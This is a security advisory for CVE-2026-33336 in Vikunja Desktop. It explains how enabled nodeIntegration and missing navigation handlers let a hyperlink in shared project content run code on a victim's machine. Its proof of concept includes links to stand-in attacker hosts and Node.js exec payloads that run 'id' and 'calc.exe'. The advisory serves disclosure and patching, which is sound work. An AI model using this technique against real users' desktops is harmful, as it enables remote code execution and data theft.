PT-2026-27444 · Go Vikunja · Vikunja
Kolaente
·
Published
2026-03-24
·
Updated
2026-03-24
·
CVE-2026-33336
CVSS v4.0
6.5
Medium
| AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H |
Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables
nodeIntegration in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue.Root cause
Two misconfigurations combine to create this vulnerability:
-
nodeIntegration: trueis set inBrowserWindowweb preferences (desktop/main.js:14-16), giving any page loaded in the renderer full access to Node.js APIs (require,child process,fs, etc.). -
No
will-navigateorwill-redirecthandler is registered on thewebContents. The existingsetWindowOpenHandler(desktop/main.js:19-23) only interceptswindow.open()calls (new-window requests). It does not intercept same-window navigations triggered by:
<a href="https://...">links (withouttarget=" blank")window.locationassignments- HTTP redirects
<meta http-equiv="refresh">tags
Attack scenario
- The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).
- The attacker creates or edits a project description or task description containing a standard HTML link, e.g.:
<a href="https://evil.example/exploit">Click here for the updated design spec</a> - The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example:
frontend/src/views/project/ProjectInfo.vueusesv-htmlwith DOMPurify-sanitized output. - The victim uses Vikunja Desktop and clicks the link.
- Because no
will-navigatehandler exists, the BrowserWindow navigates tohttps://evil.example/exploitin the same renderer process. - The attacker's page now executes in a context with
nodeIntegration: trueand runs:require('child process').exec('id > /tmp/pwned'); - Arbitrary commands execute as the victim's OS user.
Impact
Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient.
Proof of concept
- Set up a Vikunja instance with two users sharing a project.
- As the attacker user, edit a project description to include:
<a href="https://attacker.example/poc.html">Meeting notes</a> - Host poc.html with:
<script>require('child process').exec('calc.exe')</script> - As the victim, open the project in Vikunja Desktop and click the link.
- calc.exe (or any other command) executes on the victim's machine.
Credits
This vulnerability was found using GitHub Security Lab Taskflows.
Fix
Code Injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Vikunja